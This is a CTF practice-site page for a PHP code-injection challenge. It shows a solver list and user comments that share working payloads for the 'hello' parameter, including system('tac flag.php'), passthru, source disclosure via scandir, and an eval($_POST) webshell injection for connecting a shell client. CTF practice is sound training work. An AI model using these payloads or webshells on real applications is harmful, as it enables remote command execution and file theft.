评分(10)
解题动态
Tim.Drake 攻破了该题 11分钟前
语默人 攻破了该题 12分钟前
frozenfish0x 攻破了该题 6小时前
2212994366 攻破了该题 13小时前
Dayssss 攻破了该题 13小时前
卡面来打123 攻破了该题 1天前
小狗喵喵喵 攻破了该题 1天前
yangyy 攻破了该题 1天前
hdcc1 攻破了该题 1天前
xiaoxiaojiangshi 攻破了该题 1天前
YanC1e 攻破了该题 1天前
假面骑士佟以冬 攻破了该题 1天前
K-423 攻破了该题 2天前
rourou 攻破了该题 2天前
zzxmxlmz123 攻破了该题 2天前
爆汁酸菜鱼 攻破了该题 3天前
bak3l1 攻破了该题 3天前
Arno_Zoffy 攻破了该题 3天前
Newdap 攻破了该题 3天前
评论
默认 6月前
举报
hello=a=system('ls'),发现能输出东西,剩下的就是ls换成你想要做的命令,然后试试cat flag.php 这个cat是输出东西的,然后换成其他的东西都行,cat不行就tac,能出来答案 ps:在根目录下有一个叫做flag的文件,这里用 cat /flag 是没有问题的
wywsssf 6月前
举报
找到参数hello,首先?hello=system('ls'),看到flag.php,再执行?hello=system('cat flag.php'),发现无内容,尝试把cat换成tac则成功
dlgz 6月前
举报
?hello=file(%27flag.php%27) ?hello=system(%27tac%20f*%27)
wuzhi唔知 6月前
举报
http://IP:PORT/?hello="<input%20value=%27$flag%27>" ---TEST end
Bruce20231767 6月前
举报
http://117.72.52.127:18257/?hello=system(%22tac%20flag.php%22)
lmds 6月前
举报
?hello=passthru('tac flag.php')
TUGUNBB 6月前
举报
?hello=system("base64 flag.php"),拿到的东西base64解码就行了
iNMB 7月前
举报
简单粗暴,直接连蚁剑?hello=);eval($_POST[%27attack%27]);//
一个姓⎝李⎠的师傅~ 5月前
举报
@a6819772 看你 \$_POST['这里用什么接收'] 就填写什么密码
a6819772 6月前
举报
密码填什么 连蚁剑的话
SLfanCTF 7月前
举报
?hello=show_source(next(array_reverse(scandir(current(localeconv())))))
zhuizhui 7月前
举报
hello=);system('tac fl*');//